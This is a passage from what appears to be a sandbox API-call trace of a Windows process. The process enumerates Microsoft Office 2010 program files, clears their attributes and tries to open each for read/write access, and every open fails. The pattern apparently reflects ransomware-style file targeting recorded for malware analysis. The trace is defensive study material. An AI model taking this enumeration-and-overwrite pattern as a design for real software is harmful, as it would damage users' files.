dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.443] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.443] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.444] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.444] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.444] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\MSCOL11.PPD", dwFileAttributes=0x80) returned 0 [0137.444] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\MSCOL11.PPD" (normalized: "c:\\program files\\microsoft office\\office14\\mscol11.ppd"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.444] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.444] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.444] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.444] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.444] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\mscss7cm_en.dub", dwFileAttributes=0x80) returned 0 [0137.444] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\mscss7cm_en.dub" (normalized: "c:\\program files\\microsoft office\\office14\\mscss7cm_en.dub"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.445] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.445] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.445] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.445] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.445] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\mscss7cm_es.dub", dwFileAttributes=0x80) returned 0 [0137.445] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\mscss7cm_es.dub" (normalized: "c:\\program files\\microsoft office\\office14\\mscss7cm_es.dub"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.445] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.445] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.445] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.445] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.445] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\mscss7cm_fr.dub", dwFileAttributes=0x80) returned 0 [0137.446] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\mscss7cm_fr.dub" (normalized: "c:\\program files\\microsoft office\\office14\\mscss7cm_fr.dub"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.446] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.446] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.446] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.446] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.446] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.446] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.446] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.447] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\mscss7wre_en.dub", dwFileAttributes=0x80) returned 0 [0137.447] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\mscss7wre_en.dub" (normalized: "c:\\program files\\microsoft office\\office14\\mscss7wre_en.dub"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.447] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.447] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.447] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.447] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.447] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\mscss7wre_es.dub", dwFileAttributes=0x80) returned 0 [0137.447] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\mscss7wre_es.dub" (normalized: "c:\\program files\\microsoft office\\office14\\mscss7wre_es.dub"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.447] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.447] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.448] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.448] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.448] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\mscss7wre_fr.dub", dwFileAttributes=0x80) returned 0 [0137.448] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\mscss7wre_fr.dub" (normalized: "c:\\program files\\microsoft office\\office14\\mscss7wre_fr.dub"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.448] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.448] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.448] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.448] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.448] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.448] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\mset7db.kic", dwFileAttributes=0x80) returned 0 [0137.448] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\mset7db.kic" (normalized: "c:\\program files\\microsoft office\\office14\\mset7db.kic"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.448] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.449] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.449] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.449] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.449] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\mset7en.kic", dwFileAttributes=0x80) returned 0 [0137.449] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\mset7en.kic" (normalized: "c:\\program files\\microsoft office\\office14\\mset7en.kic"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.450] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.450] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.450] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.450] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.450] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\mset7es.kic", dwFileAttributes=0x80) returned 0 [0137.450] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\mset7es.kic" (normalized: "c:\\program files\\microsoft office\\office14\\mset7es.kic"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.450] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.450] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.450] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.450] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.450] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\mset7fr.kic", dwFileAttributes=0x80) returned 0 [0137.451] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\mset7fr.kic" (normalized: "c:\\program files\\microsoft office\\office14\\mset7fr.kic"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.451] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.451] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.451] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.451] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.452] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\mset7ge.kic", dwFileAttributes=0x80) returned 0 [0137.452] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\mset7ge.kic" (normalized: "c:\\program files\\microsoft office\\office14\\mset7ge.kic"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.452] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.452] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.452] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.452] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.453] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\mset7jp.kic", dwFileAttributes=0x80) returned 0 [0137.453] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\mset7jp.kic" (normalized: "c:\\program files\\microsoft office\\office14\\mset7jp.kic"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.453] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.453] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.453] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.453] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.453] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.453] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.453] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\MSN.ICO", dwFileAttributes=0x80) returned 0 [0137.453] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\MSN.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\msn.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.453] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.453] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.454] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.454] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.454] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\MSO0127.ACL", dwFileAttributes=0x80) returned 0 [0137.454] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\MSO0127.ACL" (normalized: "c:\\program files\\microsoft office\\office14\\mso0127.acl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.454] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.454] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.454] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.454] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.454] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.454] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.454] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.454] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.454] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.454] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.454] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.454] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.454] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.454] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.454] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\MSOUTL.OLB", dwFileAttributes=0x80) returned 0 [0137.455] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\MSOUTL.OLB" (normalized: "c:\\program files\\microsoft office\\office14\\msoutl.olb"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.455] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.455] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.455] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.455] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.455] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.455] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.455] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\MSPPT.OLB", dwFileAttributes=0x80) returned 0 [0137.455] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\MSPPT.OLB" (normalized: "c:\\program files\\microsoft office\\office14\\msppt.olb"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.455] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.455] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.455] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.455] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.456] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\MSPRJ.OLB", dwFileAttributes=0x80) returned 0 [0137.457] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\MSPRJ.OLB" (normalized: "c:\\program files\\microsoft office\\office14\\msprj.olb"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.457] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.457] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.457] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.457] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.457] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.457] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.457] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.457] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.458] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\MSPUB.TLB", dwFileAttributes=0x80) returned 0 [0137.458] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\MSPUB.TLB" (normalized: "c:\\program files\\microsoft office\\office14\\mspub.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.458] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.458] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.458] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.458] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.458] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.458] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.458] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.458] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.458] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.459] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\MSWORD.OLB", dwFileAttributes=0x80) returned 0 [0137.459] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\MSWORD.OLB" (normalized: "c:\\program files\\microsoft office\\office14\\msword.olb"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.459] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.459] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.459] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.460] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.460] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.460] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\MYSL.ICO", dwFileAttributes=0x80) returned 0 [0137.460] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\MYSL.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\mysl.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.460] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.460] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.460] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.460] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.460] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.460] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.460] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.460] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.460] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.460] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.460] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.460] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.460] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.460] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.460] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.460] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.460] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.461] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OCRHC.DAT", dwFileAttributes=0x80) returned 0 [0137.461] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OCRHC.DAT" (normalized: "c:\\program files\\microsoft office\\office14\\ocrhc.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.461] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.461] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.461] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.461] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.462] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OCRVC.DAT", dwFileAttributes=0x80) returned 0 [0137.462] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OCRVC.DAT" (normalized: "c:\\program files\\microsoft office\\office14\\ocrvc.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.462] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.462] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.462] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.462] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.462] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OEMPRINT.CAT", dwFileAttributes=0x80) returned 0 [0137.462] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OEMPRINT.CAT" (normalized: "c:\\program files\\microsoft office\\office14\\oemprint.cat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.462] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.462] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.463] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.463] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.463] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.463] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.463] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.463] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.463] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.463] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.463] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.463] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: 